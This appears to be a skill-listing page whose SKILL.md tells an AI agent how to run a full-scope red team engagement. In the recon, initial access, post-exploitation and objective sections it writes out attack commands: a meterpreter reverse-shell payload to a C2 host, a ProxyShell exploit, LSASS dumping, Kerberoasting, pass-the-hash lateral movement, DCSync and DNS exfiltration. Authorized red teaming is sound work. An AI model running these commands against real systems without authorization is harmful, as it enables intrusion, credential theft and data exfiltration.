conducting-full-scope-red-team-engagement
Plan and execute a comprehensive red team engagement covering reconnaissance through post-exploitation using MITRE ATT&CK-aligned TTPs to evaluate an organization's detection and response capabilities.
Best use case
conducting-full-scope-red-team-engagement is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Plan and execute a comprehensive red team engagement covering reconnaissance through post-exploitation using MITRE ATT&CK-aligned TTPs to evaluate an organization's detection and response capabilities.
Teams using conducting-full-scope-red-team-engagement should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/conducting-full-scope-red-team-engagement/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How conducting-full-scope-red-team-engagement Compares
| Feature / Agent | conducting-full-scope-red-team-engagement | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Plan and execute a comprehensive red team engagement covering reconnaissance through post-exploitation using MITRE ATT&CK-aligned TTPs to evaluate an organization's detection and response capabilities.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Marketing
Discover AI agents for marketing workflows, from SEO and content production to campaign research, outreach, and analytics.
AI Agents for Startups
Explore AI agent skills for startup validation, product research, growth experiments, documentation, and fast execution with small teams.
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
SKILL.md Source
# Conducting Full-Scope Red Team Engagement
## Overview
A full-scope red team engagement simulates real-world adversary behavior across all phases of the cyber kill chain — from initial reconnaissance through data exfiltration — to evaluate an organization's detection, prevention, and response capabilities. Unlike penetration testing, red team operations prioritize stealth, persistence, and objective-based scenarios that mimic advanced persistent threats (APTs).
## When to Use
- When conducting security assessments that involve conducting full scope red team engagement
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
## Prerequisites
- Written authorization (Rules of Engagement document) signed by executive leadership
- Defined scope including in-scope/out-of-scope systems, escalation contacts, and emergency stop procedures
- Threat intelligence on relevant adversary groups (e.g., APT29, FIN7, Lazarus Group)
- Red team infrastructure: C2 servers, redirectors, phishing domains, payload development environment
- Legal review confirming compliance with Computer Fraud and Abuse Act (CFAA) and local laws
## Engagement Phases
### Phase 1: Planning and Threat Modeling
Map the engagement to specific MITRE ATT&CK tactics and techniques based on the threat profile:
| Kill Chain Phase | MITRE ATT&CK Tactic | Example Techniques |
|---|---|---|
| Reconnaissance | TA0043 | T1593 Search Open Websites/Domains, T1589 Gather Victim Identity Info |
| Resource Development | TA0042 | T1583.001 Acquire Infrastructure: Domains, T1587.001 Develop Capabilities: Malware |
| Initial Access | TA0001 | T1566.001 Spearphishing Attachment, T1078 Valid Accounts |
| Execution | TA0002 | T1059.001 PowerShell, T1204.002 User Execution: Malicious File |
| Persistence | TA0003 | T1053.005 Scheduled Task, T1547.001 Registry Run Keys |
| Privilege Escalation | TA0004 | T1068 Exploitation for Privilege Escalation, T1548.002 UAC Bypass |
| Defense Evasion | TA0005 | T1055 Process Injection, T1027 Obfuscated Files |
| Credential Access | TA0006 | T1003.001 LSASS Memory, T1558.003 Kerberoasting |
| Discovery | TA0007 | T1087 Account Discovery, T1018 Remote System Discovery |
| Lateral Movement | TA0008 | T1021.002 SMB/Windows Admin Shares, T1550.002 Pass the Hash |
| Collection | TA0009 | T1560 Archive Collected Data, T1213 Data from Information Repositories |
| Exfiltration | TA0010 | T1041 Exfiltration Over C2 Channel, T1048 Exfiltration Over Alternative Protocol |
| Impact | TA0040 | T1486 Data Encrypted for Impact, T1489 Service Stop |
### Phase 2: Reconnaissance (OSINT)
```bash
# Passive DNS enumeration
amass enum -passive -d target.com -o amass_passive.txt
# Certificate transparency log search
python3 -c "
import requests
url = 'https://crt.sh/?q=%.target.com&output=json'
r = requests.get(url)
for cert in r.json():
print(cert['name_value'])
" | sort -u > subdomains.txt
# LinkedIn employee enumeration
theHarvester -d target.com -b linkedin -l 500 -f harvest_results
# Technology fingerprinting
whatweb -v target.com --log-json=whatweb.json
# Breach data credential search (authorized)
h8mail -t target.com -o h8mail_results.csv
```
### Phase 3: Initial Access
Common initial access vectors for red team engagements:
**Spearphishing (T1566.001):**
```bash
# Generate payload with macro
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=c2.redteam.local LPORT=443 -f vba -o macro.vba
# Set up GoPhish campaign
# Configure SMTP profile, email template with pretexted lure, and landing page
gophish --config config.json
```
**External Service Exploitation (T1190):**
```bash
# Scan for vulnerable services
nmap -sV -sC --script vuln -p 80,443,8080,8443 target.com -oA vuln_scan
# Exploit known CVE (example: ProxyShell CVE-2021-34473)
python3 proxyshell_exploit.py -t mail.target.com -e attacker@target.com
```
### Phase 4: Post-Exploitation and Lateral Movement
```powershell
# Situational awareness (T1082, T1016)
whoami /all
systeminfo
ipconfig /all
net group "Domain Admins" /domain
nltest /dclist:target.com
# Credential harvesting from LSASS (T1003.001)
# Using Havoc C2 built-in module
dotnet inline-execute SafetyKatz.exe sekurlsa::logonpasswords
# Kerberoasting (T1558.003)
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
# Lateral movement via WMI (T1047)
wmiexec.py domain/user:password@target-dc -c "whoami"
# Lateral movement via PsExec (T1021.002)
psexec.py domain/admin:password@fileserver.target.com
```
### Phase 5: Objective Achievement
Define and pursue specific objectives:
1. **Domain Dominance**: Achieve Domain Admin access and DCSync credentials
2. **Data Exfiltration**: Locate and exfiltrate crown jewel data (e.g., PII, financial records)
3. **Business Impact Simulation**: Demonstrate ransomware deployment capability (without execution)
4. **Physical Access**: Badge cloning, tailgating, server room access
```bash
# DCSync attack (T1003.006)
secretsdump.py domain/admin:password@dc01.target.com -just-dc-ntlm
# Exfiltration over DNS (T1048.003)
dnscat2 --dns "domain=exfil.redteam.com" --secret=s3cr3t
```
### Phase 6: Reporting and Debrief
The report should include:
1. **Executive Summary**: Business impact, risk rating, key findings
2. **Attack Narrative**: Timeline of activities with screenshots and evidence
3. **MITRE ATT&CK Mapping**: Full heat map of techniques used
4. **Findings**: Each finding with CVSS score, evidence, remediation
5. **Detection Gap Analysis**: What the SOC detected vs. what was missed
6. **Purple Team Recommendations**: Specific detection rules for gaps identified
## Metrics and KPIs
| Metric | Description |
|---|---|
| Mean Time to Detect (MTTD) | Average time from action to SOC detection |
| Mean Time to Respond (MTTR) | Average time from detection to containment |
| TTP Coverage | Percentage of executed techniques detected |
| Objective Achievement Rate | Percentage of defined objectives completed |
| Dwell Time | Total time red team maintained access undetected |
## Tools and Frameworks
- **C2 Frameworks**: Havoc, Cobalt Strike, Sliver, Mythic, Brute Ratel C4
- **Reconnaissance**: Amass, Recon-ng, theHarvester, SpiderFoot
- **Exploitation**: Metasploit, Impacket, CrackMapExec, Rubeus
- **Post-Exploitation**: Mimikatz, SharpCollection, BOF.NET
- **Reporting**: PlexTrac, Ghostwriter, Serpico
## References
- MITRE ATT&CK Framework: https://attack.mitre.org/
- Red Team Guide: https://redteam.guide/
- PTES (Penetration Testing Execution Standard): http://www.pentest-standard.org/
- TIBER-EU Framework for Red Teaming: https://www.ecb.europa.eu/paym/cyber-resilience/tiber-eu/
- CBEST Intelligence-Led Testing: https://www.bankofengland.co.uk/financial-stability/financial-sector-continuityRelated Skills
performing-threat-emulation-with-atomic-red-team
Executes Atomic Red Team tests for MITRE ATT&CK technique validation using the atomic-operator Python framework. Loads test definitions from YAML atomics, runs attack simulations, and validates detection coverage. Use when testing SIEM detection rules, validating EDR coverage, or conducting purple team exercises.
performing-red-team-with-covenant
Conduct red team operations using the Covenant C2 framework for authorized adversary simulation, including listener setup, grunt deployment, task execution, and lateral movement tracking.
performing-red-team-phishing-with-gophish
Automate GoPhish phishing simulation campaigns using the Python gophish library. Creates email templates with tracking pixels, configures SMTP sending profiles, builds target groups from CSV, launches campaigns, and analyzes results including open rates, click rates, and credential submission statistics for security awareness assessment.
performing-purple-team-exercise
Performs purple team exercises by coordinating red team adversary emulation with blue team detection validation using MITRE ATT&CK-mapped attack scenarios, real-time detection testing, and collaborative gap remediation. Use when SOC teams need to validate detection capabilities, improve analyst skills, and close detection gaps through structured offensive-defensive collaboration.
performing-purple-team-atomic-testing
Executes Atomic Red Team tests mapped to MITRE ATT&CK techniques, performs coverage gap analysis across the ATT&CK matrix, and runs detection validation loops to measure blue team visibility. Covers Invoke-AtomicRedTeam PowerShell execution, ATT&CK Navigator layer generation for heatmaps, Sigma rule correlation, and continuous atomic testing pipelines. Activates for requests involving purple team exercises, atomic test execution, ATT&CK coverage assessment, detection engineering validation, or adversary emulation testing.
performing-oauth-scope-minimization-review
Performs OAuth 2.0 scope minimization review to identify over-permissioned third-party application integrations, excessive API scopes, unused token grants, and risky OAuth consent patterns across identity providers and SaaS platforms. Activates for requests involving OAuth scope audit, API permission review, third-party app risk assessment, or consent grant minimization.
executing-red-team-exercise
Executes comprehensive red team exercises that simulate real-world adversary operations against an organization's people, processes, and technology. The red team operates with stealth as a primary objective, employing the full attack lifecycle from initial reconnaissance through objective completion while testing the organization's detection and response capabilities. This differs from penetration testing by focusing on adversary emulation rather than vulnerability identification. Activates for requests involving red team exercise, adversary simulation, adversary emulation, or full-scope offensive security assessment.
executing-red-team-engagement-planning
Red team engagement planning is the foundational phase that defines scope, objectives, rules of engagement (ROE), threat model selection, and operational timelines before any offensive testing begins.
conducting-wireless-network-penetration-test
Conducts authorized wireless network penetration tests to assess the security of WiFi infrastructure by testing for weak encryption protocols, captive portal bypasses, evil twin attacks, WPA2/WPA3 handshake capture, rogue access point detection, and client-side attacks. The tester evaluates wireless authentication, network segmentation, and the effectiveness of wireless intrusion detection systems. Activates for requests involving wireless pentest, WiFi security assessment, WPA2/WPA3 testing, or rogue access point detection.
conducting-spearphishing-simulation-campaign
Spearphishing simulation is a targeted social engineering attack vector used by red teams to gain initial access. Unlike broad phishing campaigns, spearphishing uses OSINT-derived intelligence to craf
conducting-social-engineering-pretext-call
Plan and execute authorized vishing (voice phishing) pretext calls to assess employee susceptibility to social engineering and evaluate security awareness controls.
conducting-social-engineering-penetration-test
Design and execute a social engineering penetration test including phishing, vishing, smishing, and physical pretexting campaigns to measure human security resilience and identify training gaps.